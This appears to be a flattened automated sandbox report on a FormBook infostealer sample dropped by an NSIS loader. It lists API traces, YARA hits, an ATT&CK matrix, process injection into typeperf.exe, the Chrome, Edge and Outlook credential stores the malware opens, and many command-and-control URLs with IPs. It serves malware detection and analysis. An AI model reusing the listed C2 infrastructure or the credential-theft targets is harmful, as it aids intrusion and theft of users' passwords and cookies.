            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_0041672E cpuid 2_2_0041672E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_0041D862
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00421816
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_004218C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,2_2_00421143
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0041D1D4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00421997
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_00411AB3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_004213F7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: EnumSystemLocalesW,2_2_004213B7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_0041D45A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00421474
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_004214F7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: GetLocaleInfoW,2_2_00414DFA
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: EnumSystemLocalesW,2_2_00414DBD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_0041DE64
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_004216EC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,2_2_00414FFA
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00419D79 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00419D79
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected NSISDropper
            Source: Yara matchFile source: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected NSISDropper
            Source: Yara matchFile source: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Native API            		Path Interception412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
            System Shutdown/Reboot            		Acquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts412
            Process Injection            		LSASS Memory151
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration4
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		Traffic Duplication4
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync26
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1355500 Sample: BMhDm7YW62.exe Startdate: 07/12/2023 Architecture: WINDOWS Score: 100 32 www.zbbqis.store 2->32 34 www.speedbikesglobal.com 2->34 36 23 other IPs or domains 2->36 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 2 other signatures 2->52 11 BMhDm7YW62.exe 17 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\okawzsv.exe, PE32 11->30 dropped 14 okawzsv.exe 11->14         started        process6 signatures7 62 Multi AV Scanner detection for dropped file 14->62 64 Detected unpacking (changes PE section rights) 14->64 66 Machine Learning detection for dropped file 14->66 68 2 other signatures 14->68 17 okawzsv.exe 14->17         started        process8 signatures9 44 Maps a DLL or memory area into another process 17->44 20 zIlFieNVyhhCXAVrseNWP.exe 17->20 injected process10 process11 22 typeperf.exe 13 20->22         started        signatures12 54 Tries to steal Mail credentials (via file / registry access) 22->54 56 Tries to harvest and steal browser information (history, passwords, etc) 22->56 58 Writes to foreign memory regions 22->58 60 3 other signatures 22->60 25 zIlFieNVyhhCXAVrseNWP.exe 22->25 injected 28 firefox.exe 22->28         started        process13 dnsIp14 38 www.633922.com 103.120.80.111, 49760, 49761, 49762 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 25->38 40 belaflorloja.online 162.240.81.18, 49740, 49741, 49742 UNIFIEDLAYER-AS-1US United States 25->40 42 11 other IPs or domains 25->42

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            BMhDm7YW62.exe54%ReversingLabsWin32.Trojan.BazarLoader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\okawzsv.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\okawzsv.exe65%ReversingLabsWin32.Trojan.BazarLoader

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8D100%Avira URL Cloudmalware
            http://porousworld.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j100%Avira URL Cloudmalware
            http://www.633922.com0%Avira URL Cloudsafe
            http://www.blessingstation.org/m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pSDhyD7Jeln3ZaQ==0%Avira URL Cloudsafe
            https://mozilla.org0/0%URL Reputationsafe
            http://www.633922.com/m858/0%Avira URL Cloudsafe
            http://www.cjjmobbbshhhu.shop/m858/100%Avira URL Cloudmalware
            http://www.belaflorloja.online/m858/100%Avira URL Cloudmalware
            http://www.speedbikesglobal.com/m858/100%Avira URL Cloudmalware
            http://www.sorenad.com/m858/100%Avira URL Cloudmalware
            https://rytrk.com/track.100%Avira URL Cloudmalware
            http://www.porousworld.com/m858/100%Avira URL Cloudmalware
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.hmoatl.com/m858/0%Avira URL Cloudsafe
            http://www.lets-room.online/m858/100%Avira URL Cloudmalware
            http://www.speedbikesglobal.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIi3MNbBvSEuUIdbw==100%Avira URL Cloudmalware
            http://www.greenharbor.info/m858/100%Avira URL Cloudmalware
            http://www.greenharbor.info/m858/?yRV=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePztwTHWY2ExuMUqrQ==&GJ=C4IdWhJXSFOXR8D100%Avira URL Cloudmalware
            http://www.fortunetravelsltd.com/m858/100%Avira URL Cloudmalware
            http://hillcresthealth.online/?ts=fE1vYmlsZUNsZWFuQmxhY2t8fDQ3OWMwfGJ1Y2tldDAwM3x8fHx8fDY1NzFkY2YzYT0%Avira URL Cloudsafe
            http://sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJ100%Avira URL Cloudmalware
            http://www.hmoatl.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPBH0RooK5H1Vl7g==0%Avira URL Cloudsafe
            https://rytrk.com100%Avira URL Cloudmalware
            http://www.medical-loan24.live/m858/100%Avira URL Cloudmalware
            http://www.633922.com/m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D0%Avira URL Cloudsafe
            http://www.ozzventures.shop/m858/?GJ=C4IdWhJXSFOXR8D&yRV=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB064navYR89b2jcsA==100%Avira URL Cloudmalware
            http://www.blessingstation.org/m858/0%Avira URL Cloudsafe
            http://www.belaflorloja.online/m858/?yRV=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZpKv2rLMaYp9lnA==&GJ=C4IdWhJXSFOXR8D100%Avira URL Cloudmalware
            http://www.cjjmobbbshhhu.shop/m858/?yRV=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYozgxOSovEmgHpQ==&GJ=C4IdWhJXSFOXR8D100%Avira URL Cloudmalware
            http://www.sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g==100%Avira URL Cloudmalware
            http://www.hillcresthealth.online/m858/0%Avira URL Cloudsafe
            http://www.hillcresthealth.online/m858/?GJ=C4IdWhJXSFOXR8D&yRV=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWtyoxijgasWwkkQ==0%Avira URL Cloudsafe
            http://fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw100%Avira URL Cloudmalware
            http://blessingstation.org/m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3Qs0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            fortunetravelsltd.com
            		103.210.56.141
            		truefalse
              		unknown
              belaflorloja.online
              		162.240.81.18
              		truefalse
                		unknown
                cjjmobbbshhhu.shop
                		84.32.84.32
                		truefalse
                  		unknown
                  www.greenharbor.info
                  		69.57.161.215
                  		truefalse
                    		unknown
                    porousworld.com
                    		173.231.241.132
                    		truefalse
                      		unknown
                      hmoatl.com
                      		144.217.103.3
                      		truefalse
                        		unknown
                        www.lets-room.online
                        		194.58.112.174
                        		truefalse
                          		unknown
                          www.medical-loan24.live
                          		64.190.62.22
                          		truefalse
                            		unknown
                            ozzventures.shop
                            		84.32.84.32
                            		truefalse
                              		unknown
                              speedbikesglobal.com
                              		207.244.126.150
                              		truefalse
                                		unknown
                                blessingstation.org
                                		68.178.195.71
                                		truefalse
                                  		unknown
                                  www.633922.com
                                  		103.120.80.111
                                  		truefalse
                                    		unknown
                                    sorenad.com
                                    		217.144.107.2
                                    		truefalse
                                      		unknown
                                      www.hillcresthealth.online
                                      		208.91.197.27
                                      		truefalse
                                        		unknown
                                        www.zbbqis.store
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.porousworld.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.sorenad.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.belaflorloja.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.ozzventures.shop
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.hmoatl.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.blessingstation.org
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.hcfa-cis.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.fortunetravelsltd.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.cjjmobbbshhhu.shop
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.speedbikesglobal.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.belaflorloja.online/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.sorenad.com/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.lets-room.online/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.hmoatl.com/m858/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.porousworld.com/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8Dtrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.blessingstation.org/m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pSDhyD7Jeln3ZaQ==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.speedbikesglobal.com/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.633922.com/m858/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cjjmobbbshhhu.shop/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.speedbikesglobal.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIi3MNbBvSEuUIdbw==false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.greenharbor.info/m858/?yRV=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePztwTHWY2ExuMUqrQ==&GJ=C4IdWhJXSFOXR8Dfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.greenharbor.info/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.medical-loan24.live/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.fortunetravelsltd.com/m858/false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.hmoatl.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPBH0RooK5H1Vl7g==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.633922.com/m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8Dfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.ozzventures.shop/m858/?GJ=C4IdWhJXSFOXR8D&yRV=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB064navYR89b2jcsA==false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g==false
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.belaflorloja.online/m858/?yRV=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZpKv2rLMaYp9lnA==&GJ=C4IdWhJXSFOXR8Dfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.cjjmobbbshhhu.shop/m858/?yRV=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYozgxOSovEmgHpQ==&GJ=C4IdWhJXSFOXR8Dfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.hillcresthealth.online/m858/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.blessingstation.org/m858/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hillcresthealth.online/m858/?GJ=C4IdWhJXSFOXR8D&yRV=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWtyoxijgasWwkkQ==false
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabtypeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
